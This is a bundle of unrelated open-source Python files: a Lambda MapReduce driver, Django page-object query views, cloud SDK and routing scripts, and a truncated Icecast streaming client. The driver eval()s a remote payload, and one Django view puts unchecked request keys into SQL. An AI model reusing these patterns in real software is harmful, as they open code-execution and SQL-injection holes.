# Upload `data` to s3://bucket/key, attaching the given metadata.
def write_to_s3(bucket, key, data, metadata):
    target_bucket = s3.Bucket(bucket)
    target_bucket.put_object(Key=key, Body=data, Metadata=metadata)
# Persist the configuration of the running job locally as a json file.
def write_job_config(job_id, job_bucket, n_mappers, r_func, r_handler):
    """Write the job's settings to jobinfo.json in the working directory.

    The file is packaged into every Lambda zip (see zipLambda) so the
    functions know which job they belong to.
    """
    fname = "jobinfo.json"  # same path as the module-level JOB_INFO constant
    with open(fname, 'w') as f:
        # Stream straight to the file instead of building an intermediate string.
        json.dump({
            "jobId": job_id,
            "jobBucket": job_bucket,
            "mapCount": n_mappers,
            "reducerFunction": r_func,
            "reducerHandler": r_handler
        }, f, indent=4)
######### MAIN #############
## Set the job id for this run.
job_id = "bl-release"
# Driver configuration file.
config = json.loads(open('driverconfig.json', 'r').read())
# 1. Read every setting from the driver config (driverconfig.json).
bucket = config["bucket"]
job_bucket = config["jobBucket"]
region = config["region"]
lambda_memory = config["lambdaMemory"] # memory allotted to each Lambda
concurrent_lambdas = config["concurrentLambdas"] # max Lambdas running at once
lambda_read_timeout = config["lambda_read_timeout"]
boto_max_connections = config["boto_max_connections"]
# Long read timeout and a large connection pool so many Lambda results can be awaited.
lambda_config = Config(read_timeout=lambda_read_timeout, max_pool_connections=boto_max_connections)
lambda_client = boto3.client('lambda', config=lambda_config)
# Fetch every S3 key under the configured prefix.
all_keys = []
for obj in s3.Bucket(bucket).objects.filter(Prefix=config["prefix"]).all():
    all_keys.append(obj)
bsize = lambdautils.compute_batch_size(all_keys, lambda_memory, concurrent_lambdas)
batches = lambdautils.batch_creator(all_keys, bsize)
n_mappers = len(batches) # number of batches == number of mappers
# 2. Create the Lambda functions.
L_PREFIX = "BL"
# Names for the Lambda functions.
mapper_lambda_name = L_PREFIX + "-mapper-" + job_id;
reducer_lambda_name = L_PREFIX + "-reducer-" + job_id;
rc_lambda_name = L_PREFIX + "-rc-" + job_id;
# Write the job configuration to a local json file.
write_job_config(job_id, job_bucket, n_mappers, reducer_lambda_name, config["reducer"]["handler"]);
# Package each handler (mapper/reducer/coordinator) with its helpers into a zip.
zipLambda(config["mapper"]["name"], config["mapper"]["zip"])
zipLambda(config["reducer"]["name"], config["reducer"]["zip"])
zipLambda(config["reducerCoordinator"]["name"], config["reducerCoordinator"]["zip"])
# Register the mapper as a Lambda function.
l_mapper = lambdautils.LambdaManager(lambda_client, s3_client, region, config["mapper"]["zip"], job_id,
                                     mapper_lambda_name, config["mapper"]["handler"])
l_mapper.update_code_or_create_on_noexist()
# Register the reducer as a Lambda function.
l_reducer = lambdautils.LambdaManager(lambda_client, s3_client, region, config["reducer"]["zip"], job_id,
                                      reducer_lambda_name, config["reducer"]["handler"])
l_reducer.update_code_or_create_on_noexist()
# Register the reducer coordinator as a Lambda function.
l_rc = lambdautils.LambdaManager(lambda_client, s3_client, region, config["reducerCoordinator"]["zip"], job_id,
                                 rc_lambda_name, config["reducerCoordinator"]["handler"])
l_rc.update_code_or_create_on_noexist()
# Grant the coordinator permission on the job bucket.
l_rc.add_lambda_permission(random.randint(1,1000), job_bucket)
# Subscribe the coordinator to S3 event notifications on the job bucket.
l_rc.create_s3_eventsource_notification(job_bucket)
# Write info about the running job to S3 as json.
j_key = job_id + "/jobdata"
data = json.dumps({
    "mapCount": n_mappers,
    "totalS3Files": len(all_keys),
    "startTime": time.time()
})
write_to_s3(job_bucket, j_key, data, {})
######## Run the MapReduce job ########
mapper_outputs = []
# 3. Invoke Mappers
def invoke_lambda(batches, m_id):
    '''
    Invoke one mapper Lambda for batch m_id (1-based) and record its output.
    '''
    batch = [k.key for k in batches[m_id-1]]
    resp = lambda_client.invoke(
        FunctionName = mapper_lambda_name,
        InvocationType = 'RequestResponse',
        Payload = json.dumps({
            "bucket": bucket,
            "keys": batch,
            "jobBucket": job_bucket,
            "jobId": job_id,
            "mapperId": m_id
        })
    )
    # NOTE(review): eval() executes whatever the Lambda returns as Python
    # code; json.loads would be the safe way to parse this payload.
    out = eval(resp['Payload'].read())
    mapper_outputs.append(out)
    print("mapper output", out)
# Parallel execution
print("# of Mappers ", n_mappers)
pool = ThreadPool(n_mappers)
Ids = [i+1 for i in range(n_mappers)]
invoke_lambda_partial = partial(invoke_lambda, batches)
# Issue requests in waves of at most concurrent_lambdas mappers.
mappers_executed = 0
while mappers_executed < n_mappers:
    nm = min(concurrent_lambdas, n_mappers)
    results = pool.map(invoke_lambda_partial, Ids[mappers_executed: mappers_executed + nm])
    mappers_executed += nm
pool.close()
pool.join()
print("all the mappers finished ...")
# Deleting the mapper Lambda function is left to the operator.
# l_mapper.delete_function()
# The actual reduce phase is triggered by the reducerCoordinator Lambda.
# Estimate the approximate cost from the recorded execution times.
total_lambda_secs = 0
total_s3_get_ops = 0
total_s3_put_ops = 0
s3_storage_hours = 0
total_lines = 0
# Each mapper returns (s3 get ops, lines processed, execution seconds).
for output in mapper_outputs:
    total_s3_get_ops += int(output[0])
    total_lines += int(output[1])
    total_lambda_secs += float(output[2])
mapper_lambda_time = total_lambda_secs
#Note: Wait for the job to complete so that we can compute total cost ; poll every 5 secs
# Collect the keys written by all reducers.
reducer_keys = []
# Accumulate the total reducer execution time.
reducer_lambda_time = 0
while True:
    job_keys = s3_client.list_objects(Bucket=job_bucket, Prefix=job_id)["Contents"]
    keys = [jk["Key"] for jk in job_keys]
    total_s3_size = sum([jk["Size"] for jk in job_keys])
    print("check to see if the job is done")
    # check job done
    if job_id + "/result" in keys:
        print("job done")
        reducer_lambda_time += float(s3.Object(job_bucket, job_id + "/result").metadata['processingtime'])
        for key in keys:
            if "task/reducer" in key:
                reducer_lambda_time += float(s3.Object(job_bucket, key).metadata['processingtime'])
                reducer_keys.append(key)
        break
    time.sleep(5)
# S3 storage cost - only the mapper output is counted.
# Storage is priced at about 3 cents/GB/month.
s3_storage_hour_cost = 1 * 0.0000521574022522109 * (total_s3_size/1024.0/1024.0/1024.0) # cost per GB/hr
s3_put_cost = len(job_keys) * 0.005/1000 # PUT, COPY, POST, LIST request cost: 0.005 USD per 1000 requests
total_s3_get_ops += len(job_keys)
s3_get_cost = total_s3_get_ops * 0.004/10000 # GET, SELECT, etc request cost: 0.0004 USD per 1000 requests
# Total Lambda cost.
# Lambda at 1024MB costs 0.000001667 USD per 100ms.
total_lambda_secs += reducer_lambda_time
lambda_cost = total_lambda_secs * 0.00001667 * lambda_memory / 1024.0
s3_cost = (s3_get_cost + s3_put_cost + s3_storage_hour_cost)
# Print the cost breakdown.
#print "Reducer Lambda Cost", reducer_lambda_time * 0.00001667 * lambda_memory/ 1024.0
print("Mapper Execution Time", mapper_lambda_time)
print("Reducer Execution Time", reducer_lambda_time)
print("Tota Lambda Execution Time", total_lambda_secs)
print("Lambda Cost", lambda_cost)
print("S3 Storage Cost", s3_storage_hour_cost)
print("S3 Request Cost", s3_get_cost + s3_put_cost )
print("S3 Cost", s3_cost )
print("Total Cost: ", lambda_cost + s3_cost)
print("Total Latency: ", total_lambda_secs)
print("Result Output Lines:", total_lines)
# Deleting the reducer/coordinator Lambda functions is left to the operator.
# l_reducer.delete_function()
# l_rc.delete_function()
| 32.366038 | 111 | 0.704792 |
75c763241e9151f3dcb2863eac573651f186b3ab | 6,116 | py | Python | AutotestWebD/apps/ui_main/views/page_object.py | yangjourney/sosotest | 2e88099a829749910ca325253c9b1a2e368d21a0 | [
"MIT"
] | 422 | 2019-08-18T05:04:20.000Z | 2022-03-31T06:49:19.000Z | AutotestWebD/apps/ui_main/views/page_object.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 10 | 2019-10-24T09:55:38.000Z | 2021-09-29T17:28:43.000Z | AutotestWebD/apps/ui_main/views/page_object.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 202 | 2019-08-18T05:04:27.000Z | 2022-03-30T05:57:18.000Z | from apps.common.func.CommonFunc import *
from apps.common.func.LanguageFunc import *
from django.shortcuts import render, HttpResponse
from urllib import parse
from apps.common.config import commonWebConfig
from apps.common.func.WebFunc import *
from apps.ui_globals.services.global_textService import global_textService
from apps.config.services.serviceConfService import ServiceConfService
import json
from apps.version_manage.services.common_service import VersionService
def showPOindex(request):
    """Render the page-object index page."""
    lang = getLangTextDict(request)
    context = {
        "uiPageObjectIndex": "current-page",
        "userName": request.session.get("userName"),
        # Page title texts.
        "text": {
            "pageTitle": lang["ui"]["pageObjectMain"],
            "subPageTitle": lang["ui"]["pageObjectCheck"],
        },
        "page": 1,
    }
    if not isRelease:
        context["env"] = "test"
    # context.update(getHttpConfForUI())
    return render(request, "ui_main/page_object/page_object_index.html", context)
def queryPageObjects(request):
    """Return a paginated page-object list filtered by client-supplied criteria.

    Reads ``page``, ``queryArr`` (url-encoded json of column -> pattern)
    and ``orderBy`` from the POST body and renders the list sub-page.
    """
    page = request.POST.get("page")
    if isInt(page):
        page = int(page)
    else:
        return HttpResponse("<script>alert('请验证页数参数');</script>")
    checkArr = json.loads(parse.unquote(request.POST.get("queryArr")))
    orderBy = request.POST.get("orderBy")
    if isSqlInjectable(orderBy):
        return HttpResponse("<script>alert('查询条件非法');</script>")
    # Pick the table according to the selected version (added by Wang Jiliang, 2018-02-24).
    if VersionService.isCurrentVersion(request):
        tbName = "tb3_ui_page_object"
        versionCondition = ""
    else:
        tbName = "tb_version_global_vars"
        versionCondition = "and versionName='%s'" % request.session.get("version")
    execSql = "SELECT g.*,u.userName FROM %s g LEFT JOIN tb_user u ON g.addBy = u.loginName WHERE 1=1 AND g.state=1 %s " % (tbName,versionCondition)
    checkList = []
    for key in checkArr:
        if checkArr[key] == "":
            continue
        # Column names are interpolated into the SQL text below, so vet
        # them exactly like orderBy; values themselves use placeholders.
        if isSqlInjectable(key):
            return HttpResponse("<script>alert('查询条件非法');</script>")
        if key == "addBy":
            # addBy matches either the login name or the display name.
            checkList.append("%%%s%%" % checkArr[key])
            checkList.append("%%%s%%" % checkArr[key])
            execSql += """ and (g.addBy LIKE %s or u.userName LIKE %s) """
            continue
        checkList.append("%%%s%%" % checkArr[key])
        execSql += """ and g.%s """ % key
        execSql += """ LIKE %s"""
    execSql += """ ORDER BY %s""" % orderBy
    context = pagination(sqlStr=execSql, attrList=checkList, page=page, pageNum=commonWebConfig.testCasePageNum)
    context.update(getHttpConfForUI())
    response = render(request, "ui_main/page_object/SubPages/page_object_list_subpage.html", context)
    return response
def addPOindex(request):
    """Render the page-object add/configuration page."""
    lang = getLangTextDict(request)
    context = {
        "uiPageObjectAdd": "current-page",
        "userName": request.session.get("userName"),
        # Page title texts.
        "text": {
            "pageTitle": lang["web"]["httpUserCenterGlobalTextPageTitle"],
            "subPageTitle": lang["web"]["httpUserCenterGlobalTextSubPageTitle"],
        },
    }
    if not isRelease:
        context["env"] = "test"
    context.update(getHttpConfForUI())
    context["page"] = 1
    # return render(request, "ui_main/page_object/page_object_add.html", context)
    return render(request, "ui_main/page_object/page_object_conf.html", context)
def queryPageObjectsList(request):
    """Return a paginated list from tb_ui_page_object for the add sub-page.

    Fix: the query aliases the table as ``u`` but the filter clauses were
    appended as ``g.<col>``, which produced invalid SQL (unknown alias).
    """
    page = request.POST.get("page")
    if isInt(page):
        page = int(page)
    else:
        return HttpResponse("<script>alert('请验证页数参数');</script>")
    checkArr = json.loads(parse.unquote(request.POST.get("queryArr")))
    orderBy = request.POST.get("orderBy")
    if isSqlInjectable(orderBy):
        return HttpResponse("<script>alert('查询条件非法');</script>")
    # Version-dependent table selection (added by Wang Jiliang, 2018-02-24).
    # NOTE(review): tbName/versionCondition are computed but unused below —
    # presumably leftover from the copied query; confirm before removing.
    if VersionService.isCurrentVersion(request):
        tbName = "tb3_ui_page_object"
        versionCondition = ""
    else:
        tbName = "tb_version_global_vars"
        versionCondition = "and versionName='%s'" % request.session.get("version")
    execSql = "SELECT u.* from tb_ui_page_object u WHERE 1=1 "
    checkList = []
    for key in checkArr:
        if checkArr[key] == "":
            continue
        # Column names are interpolated into the SQL text, so vet them
        # exactly like orderBy; values themselves use placeholders.
        if isSqlInjectable(key):
            return HttpResponse("<script>alert('查询条件非法');</script>")
        checkList.append("%%%s%%" % checkArr[key])
        execSql += """ and u.%s """ % key
        execSql += """ LIKE %s"""
    execSql += """ ORDER BY %s""" % orderBy
    context = pagination(sqlStr=execSql, attrList=checkList, page=page, pageNum=commonWebConfig.testCasePageNum)
    context.update(getHttpConfForUI())
    response = render(request, "ui_main/page_object/subPages/page_object_add_subpage.html", context)
    return response
def queryText(request):
page = request.POST.get("page")
if isInt(page):
page = int(page)
else:
return HttpResponse("<script>alert('请验证页数参数');</script>")
checkArr = json.loads(parse.unquote(request.POST.get("queryArr")))
orderBy = request.POST.get("orderBy")
if isSqlInjectable(orderBy):
return HttpResponse("<script>alert('查询条件非法');</script>")
execSql = "SELECT g.* from tb_ui_page_object g WHERE 1=1 "
checkList = []
for key in checkArr:
if checkArr[key] == "":
continue
checkList.append("%%%s%%" % checkArr[key])
execSql += """ and g.%s """ % key
execSql += """ LIKE %s"""
execSql += """ ORDER BY %s""" % orderBy
print("execSql:", execSql)
print("22222222222222222222")
context = pagination(sqlStr=execSql, attrList=checkList, page=page, pageNum=commonWebConfig.testCasePageNum)
print("33333333333333333333333")
response = render(request, "ui_main/page_object/SubPages/page_object_conf_sub_page.html", context)
return response | 37.292683 | 150 | 0.65206 |
f2daa1601668f341063ec5a544ecc640ce8a4664 | 2,100 | py | Python | aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/CancelAutoSnapshotPolicyRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/CancelAutoSnapshotPolicyRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/CancelAutoSnapshotPolicyRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecs.endpoint import endpoint_data
class CancelAutoSnapshotPolicyRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ecs', '2014-05-26', 'CancelAutoSnapshotPolicy','ecs')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self): # Long
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self, ResourceOwnerId): # Long
self.add_query_param('ResourceOwnerId', ResourceOwnerId)
def get_diskIds(self): # String
return self.get_query_params().get('diskIds')
def set_diskIds(self, diskIds): # String
self.add_query_param('diskIds', diskIds)
def get_ResourceOwnerAccount(self): # String
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self, ResourceOwnerAccount): # String
self.add_query_param('ResourceOwnerAccount', ResourceOwnerAccount)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
| 38.888889 | 83 | 0.765714 |
c2df9bcff3455b55de162e28eebf3760322e2b67 | 412 | py | Python | uscis_service/src/constants.py | FrenchCommando/uscis-status | 34b9a5db38130d595d3c3889a764e7c134d2287b | [
"MIT"
] | 4 | 2020-05-18T14:45:20.000Z | 2021-08-24T19:43:17.000Z | uscis_service/src/constants.py | FrenchCommando/uscis-status | 34b9a5db38130d595d3c3889a764e7c134d2287b | [
"MIT"
] | null | null | null | uscis_service/src/constants.py | FrenchCommando/uscis-status | 34b9a5db38130d595d3c3889a764e7c134d2287b | [
"MIT"
] | 1 | 2020-05-18T01:26:19.000Z | 2020-05-18T01:26:19.000Z | import os
IS_DOCKER = os.environ.get('AM_I_IN_A_DOCKER_CONTAINER', False)
uscis_database = "uscis"
uscis_table_name = "uscis_table"
error_table_name = "error_table"
host = "db" if IS_DOCKER else "localhost"
host_uscis_service = "uscis_service" if IS_DOCKER else "localhost"
pg_port_number = 5432 # port of pg service
port_number = 5000 # port to host server
port_number_dash = 8050 # port to host server
| 25.75 | 66 | 0.771845 |
de4821f5843be5f3890a4d07363013fa5996c916 | 1,682 | py | Python | config/urls.py | eziolevine/openstage | 25136f0b8d8440eddcd50547aad6c117b8c85393 | [
"BSD-3-Clause"
] | null | null | null | config/urls.py | eziolevine/openstage | 25136f0b8d8440eddcd50547aad6c117b8c85393 | [
"BSD-3-Clause"
] | null | null | null | config/urls.py | eziolevine/openstage | 25136f0b8d8440eddcd50547aad6c117b8c85393 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
from openstage.interviews.views import InterviewListView
urlpatterns = [
url(r'^$', InterviewListView.as_view(), name="home"),
url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name="about"),
url(r'^grappelli/', include('grappelli.urls')), # grappelli URLS
# Django Admin, use {% url 'admin:index' %}
url(settings.ADMIN_URL, include(admin.site.urls)),
# User management
url(r'^users/', include("openstage.users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
url(r'^interviews/', include('openstage.interviews.urls')),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception("Bad Request!")}),
url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception("Permissin Denied")}),
url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception("Page not Found")}),
url(r'^500/$', default_views.server_error),
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 43.128205 | 109 | 0.712842 |
f45ddd5ef20bbe0e8194451a1317e7f5f86235a5 | 437 | py | Python | quadratic.py | DariaMagarshak/python_training | 03c2c5c879db6c65ed3ca8453b8b2c0c8b033dc1 | [
"Apache-2.0"
] | null | null | null | quadratic.py | DariaMagarshak/python_training | 03c2c5c879db6c65ed3ca8453b8b2c0c8b033dc1 | [
"Apache-2.0"
] | null | null | null | quadratic.py | DariaMagarshak/python_training | 03c2c5c879db6c65ed3ca8453b8b2c0c8b033dc1 | [
"Apache-2.0"
] | null | null | null | from math import sqrt
def solve(a, b, c):
d = b*b - 4*a*c
if d < 0:
print("No solutions")
elif d == 0:
x = -b / (2*a)
print("One solution" + str(x))
elif d > 0:
x1 = (-b + sqrt(d)) / (2*a)
x2 = (-b - sqrt(d)) / (2 * a)
print("Two solutions" + str(x1) + " and" + str(x2))
else:
print("A-A-A!!")
solve(1, 1, 1)
solve(1, 2, 1)
solve(1, 5, 6) | 21.85 | 63 | 0.405034 |
2b1b9578bd49eb0a7582ca410606520ea73e767a | 3,287 | py | Python | python/example_code/set-routetb-multilb.py | nifcloud/nifcloud-sample | 336773d8f0a2fb842fc20bb33da9ba83c5ed4457 | [
"Apache-2.0"
] | null | null | null | python/example_code/set-routetb-multilb.py | nifcloud/nifcloud-sample | 336773d8f0a2fb842fc20bb33da9ba83c5ed4457 | [
"Apache-2.0"
] | 3 | 2022-01-21T14:07:01.000Z | 2022-01-24T02:11:05.000Z | python/example_code/set-routetb-multilb.py | nifcloud/nifcloud-sample | 336773d8f0a2fb842fc20bb33da9ba83c5ed4457 | [
"Apache-2.0"
] | null | null | null | from nifcloud import session
import sys
# --- define --------
# -- MULTILB Name -------
MULTILB_NAME = "web"
MULTILB_WAIT_PORT = 8080
MULTILB_TARGET_PORT = 80
MULTILB_PROTOCOL = 'HTTP'
# --------------------
# -- Routing Info --------
TARGET_CIDER = '10.2.3.0/24'
TARGET_NEXTHOP = '10.4.4.1'
# --------------------
# -------------------
# ----- Add Route Table Multi Load Balancer ----------------
def create_multi_lb(client):
try:
# Create Route Table
route_table = client.create_route_table()
# add Routing Info
"""
┃
┏━┻━━┓
┃MultiLB ┃
┗━┳━━┛
┏━━━┻━━━━┓
┃ ┃
IpAddress ┏━┻━━━━━━━━━┓
┏━━━━━━━━━━┓┃Network ┃
┃DestinationCidrBlock┃┃(DestinationCidrBlock)┃
┗━━━━━━━━━━┛┗━━━━━━━━━━━┛
client.create_route(
# Target RouteTable
RouteTableId='string',
# Destination IP Range(CIDR)
DestinationCidrBlock='string',
# Set either NetworkName or NetworkId or IpAddress
# Next Hop Ipaddress
IpAddress='string',
# Target Private LAN ID
NetworkId='string',
# Target Private LAN Name
NetworkName='string',
)
"""
result = client.create_route(
# Target RouteTable
RouteTableId=route_table['RouteTable']['RouteTableId'],
# Destination IP Range(CIDR)
DestinationCidrBlock=TARGET_CIDER,
# Set either NetworkName or NetworkId or IpAddress
# Next Hop Ipaddress
IpAddress=TARGET_NEXTHOP,
)
if not result['Return']:
print("Add Route Error")
sys.exit(1)
# Get Multl Load Balancer ID
mlb = client.nifty_describe_elastic_load_balancers(
ElasticLoadBalancers={
'ListOfRequestElasticLoadBalancerName': [
MULTILB_NAME,
],
'ListOfRequestElasticLoadBalancerPort': [
MULTILB_WAIT_PORT,
],
'ListOfRequestInstancePort': [
MULTILB_TARGET_PORT,
],
'ListOfRequestProtocol': [
MULTILB_PROTOCOL,
]
}
)
mlb_id = \
mlb['NiftyDescribeElasticLoadBalancersResult']['ElasticLoadBalancerDescriptions'][0]['ElasticLoadBalancerId']
# Set Route Table
result = \
client.nifty_associate_route_table_with_elastic_load_balancer(
ElasticLoadBalancerId=mlb_id,
RouteTableId=route_table['RouteTable']['RouteTableId'],
)
if not result['Return']:
print("Set Route Table Error")
sys.exit(1)
except Exception as e:
print("exception :", e, "\nin :", sys._getframe().f_code.co_name)
sys.exit(1)
# -------------- main ----------------
client = session.get_session().create_client(
"computing",
region_name="jp-east-2",
)
create_multi_lb(client)
| 30.719626 | 121 | 0.485549 |
680e62c9c5000846401236876454cb6012fe83fc | 587 | py | Python | helpers/admins.py | Goswamiroyal/Miss_fruity_music- | b172b6854acfcb828ac2928b7c9b019c91da58b1 | [
"MIT"
] | 23 | 2021-09-14T11:36:24.000Z | 2022-03-22T09:55:05.000Z | helpers/admins.py | Goswamiroyal/Miss_fruity_music- | b172b6854acfcb828ac2928b7c9b019c91da58b1 | [
"MIT"
] | null | null | null | helpers/admins.py | Goswamiroyal/Miss_fruity_music- | b172b6854acfcb828ac2928b7c9b019c91da58b1 | [
"MIT"
] | 54 | 2021-09-14T16:10:35.000Z | 2022-03-25T19:21:11.000Z | import cache.admins
from typing import List
from pyrogram.types import Chat
from cache.admins import get as gett
from cache.admins import set
async def get_administrators(chat: Chat) -> List[int]:
get = gett(chat.id)
if get:
return get
else:
administrators = await chat.get_members(filter="administrators")
to_set = []
for administrator in administrators:
if administrator.can_manage_voice_chats:
to_set.append(administrator.user.id)
set(chat.id, to_set)
return await get_administrators(chat)
| 24.458333 | 72 | 0.678024 |
29279cad67279ea941da539d8cdeec8d03fb403f | 1,677 | py | Python | Base/BaseTempFolder.py | SamanFekri/BookRecommendation | 07dfa875154af39546cb263d4407339ce26d47e8 | [
"MIT"
] | null | null | null | Base/BaseTempFolder.py | SamanFekri/BookRecommendation | 07dfa875154af39546cb263d4407339ce26d47e8 | [
"MIT"
] | null | null | null | Base/BaseTempFolder.py | SamanFekri/BookRecommendation | 07dfa875154af39546cb263d4407339ce26d47e8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 19/06/2019
@author: Maurizio Ferrari Dacrema
"""
from Base.Recommender_utils import get_unique_temp_folder
import os, shutil
class BaseTempFolder(object):
def __init__(self):
super(BaseTempFolder, self).__init__()
self.DEFAULT_TEMP_FILE_FOLDER = './result_experiments/__Temp_{}/'.format(self.RECOMMENDER_NAME)
def _get_unique_temp_folder(self, input_temp_file_folder = None):
if input_temp_file_folder is None:
print("{}: Using default Temp folder '{}'".format(self.RECOMMENDER_NAME, self.DEFAULT_TEMP_FILE_FOLDER))
self._use_default_temp_folder = True
output_temp_file_folder = get_unique_temp_folder(self.DEFAULT_TEMP_FILE_FOLDER)
else:
print("{}: Using Temp folder '{}'".format(self.RECOMMENDER_NAME, input_temp_file_folder))
self._use_default_temp_folder = False
output_temp_file_folder = get_unique_temp_folder(input_temp_file_folder)
if not os.path.isdir(output_temp_file_folder):
os.makedirs(output_temp_file_folder)
return output_temp_file_folder
def _clean_temp_folder(self, temp_file_folder):
"""
Clean temporary folder only if the default one
:return:
"""
if self._use_default_temp_folder:
print("{}: Cleaning temporary files from '{}'".format(self.RECOMMENDER_NAME, temp_file_folder))
shutil.rmtree(temp_file_folder, ignore_errors=True)
else:
print("{}: Maintaining temporary files due to a custom temp folder being selected".format(self.RECOMMENDER_NAME))
| 32.25 | 125 | 0.692904 |
5b24933966691e5d41acff47087e140eff99ee11 | 8,519 | py | Python | Sketches/RJL/HTTP/IcecastClient.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/RJL/HTTP/IcecastClient.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/RJL/HTTP/IcecastClient.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | # -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""\
===================
Icecast/SHOUTcast MP3 streaming client
===================
This component uses HTTP to stream MP3 audio from a SHOUTcast/Icecast server.
Example Usage
-------------
IcecastClient fetches the combined audio and metadata stream from the
HTTP server hosting the stream. IcecastDemux separates the audio data
from the metadata in stream and IcecastStreamWriter writes the audio
data to disk (discarding metadata).
pipeline(
IcecastClient("http://64.236.34.97:80/stream/1049"),
IcecastDemux(),
IcecastStreamWriter("stream.mp3"),
).run()
How does it work?
-----------------
The SHOUTcast protocol is virtually identical to HTTP. As such, IcecastClient
subclasses SingleShotHTTPClient modifying the request slightly to ask for
stream metadata(e.g. track name) to be included (by adding the icy-metadata header).
It is otherwise identical to its parent class.
"""
from Axon.Component import component
from Axon.Ipc import producerFinished, shutdownMicroprocess, shutdown
from Kamaelia.Internet.TCPClient import TCPClient
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import string, time
from HTTPParser import *
from HTTPClient import *
def intval(mystring):
try:
retval = int(mystring)
except ValueError:
retval = None
except TypeError:
retval = None
return retval
def removeTrailingCr(line):
if len(line) == 0:
return ""
elif line[-1] == "\r":
return line[0:-1]
else:
return line
class IceIPCHeader(object):
def __init__(self, contenttype):
self.contenttype = contenttype
class IceIPCMetadata(object):
def __init__(self, metadata):
self.metadata = metadata
class IceIPCDataChunk(object):
def __init__(self, data):
self.data = data
class IceIPCDisconnected(object):
pass
class IcecastDemux(component):
"""Splits an Icecast stream into A/V data and metadata"""
def dictizeMetadata(self, metadata):
#print "IcecastClient.dictizeMetadata()"
#format:
#StreamUrl='www.example.com';
#StreamTitle='singer, title';
lines = metadata.split(";")
metadict = {}
for line in lines:
splitline = line.split("=",1)
if len(splitline) > 1:
key = splitline[0]
val = splitline[1]
if val[:1] == "\n":
val = val[1:]
if val[0:1] == "'" and val[-1:] == "'":
val = val[1:-1]
metadict[key] = val
return metadict
def main(self):
metadatamode = False
readbuffer = ""
while 1:
yield 1
while self.dataReady("inbox"):
msg = self.recv("inbox")
if isinstance(msg, ParsedHTTPHeader):
metadatainterval = intval(msg.header["headers"].get("icy-metaint", 0))
if metadatainterval == None:
metadatainterval = 0
bytesUntilMetadata = metadatainterval
self.send(IceIPCHeader(msg.header["headers"].get("content-type")), "outbox")
print "Metadata interval is " + str(metadatainterval)
